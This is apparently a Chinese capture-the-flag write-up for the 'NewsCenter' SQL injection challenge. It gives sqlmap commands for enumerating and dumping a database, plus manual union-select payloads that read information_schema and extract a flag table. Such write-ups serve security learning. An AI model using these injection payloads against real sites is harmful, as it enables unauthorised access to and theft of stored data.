NewsCenter
进入界面
是一个明显的SQL注入题目
(前面的图由于先存在word再复制过来所有略微有点小糊)
sqlmap
首先使用工具偷个懒
随意的输入一个BEACON
Burp Suite抓包
存为TXT文件(我这里存为 NEWSCENTER.txt )
放入sqlmap目录
打开大杀器-sqlmap
查找数据库
sqlmap>python sqlmap.py -r NEWSCENTER.txt –dbs
查找表
python sqlmap.py -r NEWSCENTER.txt --tables -D news
查找列名
python sqlmap.py -r NEWSCENTER.txt --column -D news -T secret_table
看到了希望,读取它就🆗啦
python sqlmap.py -r NEWSCENTER.txt --dump -D news -T secret_table -C fl4g
纯手工
来一个基本的 'union select 1,2,3 #
提示就来了
'and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'#
'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
'and 0 union select 1,2,fl4g from secret_table #
个人对sql注入的语句还不够熟悉
手动注入的时候还是得开卷
下次整理一份sql注入语句
具体使用在资料中有网上找到的常用sql语句
资料